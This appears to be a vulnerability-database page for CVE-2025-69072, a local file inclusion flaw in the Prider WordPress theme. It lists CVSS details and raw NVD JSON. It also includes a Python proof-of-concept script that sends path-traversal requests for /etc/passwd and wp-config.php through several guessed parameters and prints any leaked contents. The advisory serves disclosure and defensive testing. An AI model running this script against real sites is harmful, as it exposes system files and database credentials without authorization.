Security Vulnerability Report
中文
CVE-2025-69072 CVSS 8.1 HIGH

CVE-2025-69072

Published: 2026-01-22 17:16:21
Last Modified: 2026-04-15 00:35:42

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Prider prider allows PHP Local File Inclusion.This issue affects Prider: from n/a through <= 1.1.3.1.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Prider Theme <= 1.1.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-69072 PoC - Prider Theme LFI # Target: WordPress site using Prider theme <= 1.1.3.1 def test_lfi(target_url, filename): """ Test for Local File Inclusion vulnerability in Prider theme Args: target_url: Base URL of the WordPress site filename: File to read (e.g., /etc/passwd, wp-config.php) """ # Common Prider theme file inclusion parameter patterns params = [ {'file': filename}, {'page': filename}, {'template': filename}, {'theme': filename}, {'load': filename} ] for param in params: try: response = requests.get(target_url, params=param, timeout=10) # Check if file content is leaked if response.status_code == 200: # Check for common file signatures if '/etc/passwd' in filename and 'root:' in response.text: print(f'[+] VULNERABLE! File inclusion via parameter: {list(param.keys())[0]}') print(f'[+] Content preview:\n{response.text[:500]}') return True elif 'wp-config.php' in filename and 'DB_NAME' in response.text: print(f'[+] VULNERABLE! Database config leaked via parameter: {list(param.keys())[0]}') print(f'[+] Content preview:\n{response.text[:500]}') return True except requests.RequestException as e: print(f'[-] Request error: {e}') return False # Example usage if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-69072-poc.py <target_url>') print('Example: python cve-2025-69072-poc.py http://example.com') sys.exit(1) target = sys.argv[1] print(f'[*] Testing {target} for CVE-2025-69072') # Test reading /etc/passwd test_lfi(target, '../../../../etc/passwd') # Test reading WordPress config test_lfi(target, '../../../../var/www/html/wp-config.php')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69072", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:21.227", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Prider prider allows PHP Local File Inclusion.This issue affects Prider: from n/a through <= 1.1.3.1."}, {"lang": "es", "value": "Control inadecuado del nombre de fichero para la declaración include/require en programa PHP ('inclusión remota de ficheros PHP') vulnerabilidad en AncoraThemes Prider prider permite inclusión local de ficheros PHP. Este problema afecta a Prider: desde n/a hasta &lt;= 1.1.3.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/prider/vulnerability/wordpress-prider-theme-1-1-3-1-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}